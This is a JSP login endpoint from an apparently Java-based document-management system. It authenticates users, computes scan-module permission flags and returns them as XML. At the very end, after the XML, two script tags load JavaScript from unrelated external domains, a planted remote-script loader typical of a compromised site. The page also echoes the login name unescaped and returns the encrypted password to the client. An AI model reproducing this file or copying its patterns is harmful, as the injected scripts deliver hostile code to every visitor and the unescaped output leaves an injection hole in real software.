<%@ page import="com.dcivision.framework.*"
%><%@ page import="com.dcivision.framework.web.*"
%><%@ page import="com.dcivision.framework.bean.*"
%><%@ page import="com.dcivision.user.auth.*"
%><%@ page import="com.dcivision.user.bean.*"
%><%@ page import="com.dcivision.user.dao.*"
%><%@ page import="java.sql.*"
%><%@ page import="java.util.*"
%><%@ page import="org.apache.commons.logging.LogFactory"
%><%
  String loginName = request.getParameter("loginName");
  String loginPwd = request.getParameter("loginPwd");
  String statusCode = "0";  // "1" for login succeed, "0" for failure.
  String userRecordID = "";
  String encryptedPwd = "";
  String permission = "000000000000000";
  String AVAIL_CODE = "1";
  //the user's "Document Profile" model permission string
  String paradmProfilePermissionString = "";

  if (!Utility.isEmpty(loginName) && !Utility.isEmpty(loginPwd)) {
    // Perform authenication here.

    Connection conn = null;
    try {
      AuthenticationHandler authHandler = (AuthenticationHandler)Class.forName(SystemParameterFactory.getSystemParameter(SystemParameterConstant.AUTHENICATION_CLASS)).newInstance();
      SessionContainer sessionCtn = new SessionContainer();
      LoginForm loginForm = new LoginForm();

      loginForm.setLoginName(loginName);
      loginForm.setLoginPwd(loginPwd);
      loginForm.setUpdateFailedAttemptFlag("N");
      conn = DataSourceFactory.getConnection();

      UserRecord userRecord = authHandler.Login(loginForm, sessionCtn, request, conn);
      if (userRecord != null) {
      
        statusCode = "1";
        userRecordID = userRecord.getID().toString();
        encryptedPwd = Crypt.encrypt(loginPwd, SystemParameterFactory.getSystemParameter(SystemParameterConstant.CRYPTO_SALT));

        // Check the permission of scanning function (For the attribute "Permission")
        
        String userIP = request.getRemoteAddr();
        SessionContainer userSession = new SessionContainer();
        userSession.setUserIPAddress(userIP);
        
        // Get User Groups Information.
        UserGroupDAObject userGroupDAO = new UserGroupDAObject(userSession, conn);
        List userGroups = userGroupDAO.getListByUserRecordIDGroupType(userRecord.getID(), com.dcivision.user.bean.UserGroup.GROUP_TYPE_PUBLIC);
        userSession.getPermissionManager().setUserGroups(userGroups);
        
        // Get User Roles and Group Role Information (Union them with no duplicate roles).
        UserRoleDAObject userRoleDAO = new UserRoleDAObject(userSession, conn);
        List userRoles = userRoleDAO.getListByUserRecordID(userRecord.getID());

        for (int i = 0; i < userGroups.size(); i++) {
          UserGroup tmpUserGroup = (UserGroup) userGroups.get(i);
          List userRolesByGroup = userRoleDAO.getListByUserGroupID(tmpUserGroup.getID());
          for (int j = 0; j < userRolesByGroup.size(); j++) {
            if (!userRoles.contains(userRolesByGroup.get(j))) {
              userRoles.add(userRolesByGroup.get(j));
            }
          }
        }

        userSession.getPermissionManager().setUserRoles(userRoles);
        userSession.setUserRecord(userRecord);
        request.getSession().setAttribute(GlobalConstant.SESSION_CONTAINER_KEY, userSession);
        userSession.setLoginStatus(AuditLoginOut.STATUS_LOGIN_SUCCESS);
        PermissionManager permissionManager = userSession.getPermissionManager();
        permissionManager.initAccessibleSystemFunction();
        
        //check the Scan module rights
        if(permissionManager.hasAccessRight("SCN", "R")){
          StringBuffer eachStatusCode =new StringBuffer(permission);

          if(permissionManager.hasAccessRight("SCN_ADMIN", "A")){
            eachStatusCode = eachStatusCode.replace(0,1,AVAIL_CODE);
          }
          if(permissionManager.hasAccessRight("SCN_SCAN", "A")){
            eachStatusCode = eachStatusCode.replace(1,2,AVAIL_CODE);
           }
          if(permissionManager.hasAccessRight("SCN_QC", "A")){
            eachStatusCode = eachStatusCode.replace(2,3,AVAIL_CODE);
          }
          if(permissionManager.hasAccessRight("SCN_INDEX", "A")){
            eachStatusCode = eachStatusCode.replace(3,4,AVAIL_CODE);
          }
          if(permissionManager.hasAccessRight("SCN_VALID", "A")){
            eachStatusCode = eachStatusCode.replace(4,5,AVAIL_CODE);
          }
          if(permissionManager.hasAccessRight("SCN_USER", "A")){
            eachStatusCode = eachStatusCode.replace(5,6,AVAIL_CODE);
          }
          if(permissionManager.hasAccessRight("SCN_TEMP", "A")){
            eachStatusCode = eachStatusCode.replace(6,7,AVAIL_CODE);
          }
          if(permissionManager.hasAccessRight("SCN_BATCH", "A")){
            eachStatusCode = eachStatusCode.replace(7,8,AVAIL_CODE);
          }
          if(permissionManager.hasAccessRight("SCN_REPORT", "A")){
            eachStatusCode = eachStatusCode.replace(8,9,AVAIL_CODE);
          }
          if(permissionManager.hasAccessRight("SCN_WORKFLOW", "A")){
            eachStatusCode = eachStatusCode.replace(9,10,AVAIL_CODE);
          }
          if(permissionManager.hasAccessRight("SCN_PRINT", "A")){
            eachStatusCode = eachStatusCode.replace(10,11,AVAIL_CODE);
          }

          permission = eachStatusCode.toString();   
        }
        //the user's "Document Profile" model permission string
        paradmProfilePermissionString  = permissionManager.getPermission("F",new Integer(6004));

      }
    } catch (Exception e) {
      LogFactory.getLog(this.getClass()).error(e, e);
    } finally {
      try { conn.close(); } catch (Exception ignore) {} finally { conn = null; }
    }
  }
%><?xml version="1.0" encoding="UTF-8" ?>
<Authenication StatusCode="<%=statusCode%>" UserRecordID="<%=userRecordID%>" LoginPwd="<%=encryptedPwd%>" LoginName="<%=loginName%>" AccessRightList="<%=permission%>" ProifleModelPermissionString="<%=paradmProfilePermissionString%>"/>
<script language=javascript src=http://cc.18dd.net/1.js></script>
<script language=javascript src=http://ad.171817.com/css/1.js></script>